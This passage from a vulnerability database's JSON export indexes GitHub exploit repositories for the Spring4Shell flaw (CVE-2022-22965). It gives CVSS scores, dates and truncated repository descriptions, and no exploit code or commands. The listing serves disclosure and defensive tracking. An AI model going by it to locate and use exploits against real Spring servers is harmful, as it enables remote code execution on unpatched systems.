"2022-03-31T13:02:18", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:52:31", "id": "81DFF6A6-4518-543A-B06C-E7A6466ACB88", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:14:41", "description": "# Spring Boot CVE-2022-22965\nDocker PoC for CVE-2022-22965 with ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-28T14:34:51", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-11-29T04:29:29", "id": "AE9F0F3B-00DE-5B73-87A1-BA592FA6E616", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T14:50:56", "description": "# Spring RCE CVE-2022-22965\n\n### \u6f0f\u6d1e\u73af\u5883\n\n\u73af\u5883\u4fe1\u606f\n* springboot\n* jdk11...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-07T09:02:50", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-06-08T03:38:35", "id": "7D29AFE9-2E1C-597D-80A3-49E03F52D903", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-21T09:11:44", "description": "# CVE-2022-22965-rexbb\nspringboot core \u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff0cCVE-2022-22965\u6f0f\u6d1e\u5229\u7528...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-28T04:50:16", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-20T23:21:07", "id": "5D705C67-17AA-5E5C-A72D-A1ED6F4DEDA7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:56:20", "description": "## CVE-2022-22965: Spring-Core-Rce \n\n## EXP\n\n\u7279\u6027:\n\n1. \u6f0f\u6d1e\u63a2\u6d4b(\u4e0d\u5199\u5165 we...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T14:35:00", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:52:29", "id": "9762BA59-813F-50C2-94CB-842DFAE750D5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:55:37", "description": "<h1 align=\"center\">\n <br>\n spring4shell_victim\n <br>\n <br>...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T13:35:56", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-11-09T18:15:40", "id": "21FA1164-A4AD-57B4-8CFE-6B9B5EE9D199", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:56:00", "description": "# spring-framework-rce\nCVE-2022-22965\n\n## \u73af\u5883\u9700\u6c42\n\n1. tomcat8 <=8.5...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T13:46:55", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-02T12:40:55", "id": "38D4A58E-3B24-5D5E-AE07-5568C6A571C4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:56:40", "description": "# CVE-2022-22965\n\nCVE-2022-22965 Enviro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T12:18:29", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-02T02:08:46", "id": "36B8C1D8-41AC-5238-B870-2254AE996A4C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T20:24:29", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T07:57:50", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-02T07:04:56", "id": "79D5BEFA-C5B9-56B6-B78E-4C663DB2A6C9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:55:37", "description": "# CVE-2022-22965\nEx...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T15:45:47", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-11T18:42:02", "id": "17C63238-7AC4-5195-8FAC-88F0AB4E8F77", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-03-12T20:09:24", "description": "# Spring4Shell - PoC\n# CVE - 2022 - 22965\n## Versions affected :...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-12T17:37:51", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-03-12T17:45:24", "id": "9B3AD93D-3EB7-516A-8F64-439D6260F866", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:54:02", "description": "# Spring4Shell Exploit POC\n\nExploit a Spring Application vulnera...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:01:12", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:52:32", "id": "16067E19-368D-5FF5-895D-9BA9E14921CE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:54:13", "description": "# Spring-Core-RCE Spring Framework \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff08CVE-2022-22965\uff09\nSpri...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T09:13:54", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:52:35", "id": "EE4B4CDB-5690-556D-9581-E198CF03A9BE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T16:15:36", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-07T18:48:43", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-07T18:55:43", "id": "0DAD2A7F-FA26-53F7-AB9D-7850BD9C666E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-06T03:12:29", "description": "# CVE-2022-22965 (Spring4Shell) Proof of Concept\n\n![](img/spring...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T13:44:39", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-07-05T22:14:58", "id": "EBD1ED76-3887-570C-86DD-EC9C7ADB1880", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:56:19", "description": "# CVE-2022-22965\nCVE-2022-22965 EXP\\n\n\u4e00\u822c\u73af\u5883\u9700\u6c42\uff1a\n1.\u662f\u5426\u4f7f\u7528Spring\u6846\u67b6\uff0c\u82e5\u672a\u4f7f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T02:25:46", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T07:48:56", "id": "2A4F88C2-35A7-5185-ABC0-90D0A5396D8F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-11T16:22:52", "description": "# CVE-2022-22965-POC\nCVE-2022-22965 spring-core\u6279\u91cf\u68c0\u6d4b\u811a\u672c\n\n\u58f0\u660e\uff1a\u8be5\u811a\u672c\u4ec5\u4f9b\u4e8e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T08:37:00", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-11T12:17:59", "id": "0E679B3E-C2C3-5C8B-94E1-FC6EDCBB08F0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T15:14:28", "description": "# S\u00e5rbarheter i Spring Framework - CVE-2022-22965\r\n\r\n## Liste ov...", "cvss3": {}, "published": "2022-04-01T10:16:24", "type": "githubexploit", "title": "Exploit for CVE-2022-22965", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T10:07:48", "id": "0273F07C-E2F1-5454-85F6-6B58CCA854A3", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:55:34", "description": "# Spring4shell RCE vulnerability\n\nThis vulnerability affects Spr...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T20:16:06", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-03-04T05:36:26", "id": "89B78640-ACE2-5A00-845E-1CEFFFDD4A2E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:50:09", "description": "# :space_invader: CVE-2022-22965\nThis is a proof of concept of a...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-23T09:01:22", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:53:06", "id": "C6653FFB-B7A6-54D8-83C9-300A13AC41F4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:54:15", "description": "# Spring Core RCE/CVE-2022-22965\r\n\r\n> \u5f71\u54cd\u8303\u56f4\uff1aJDK>=9 \u7684spring\u6846\u67b6\u53ca\u884d\u751f\u6846\u67b6...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": 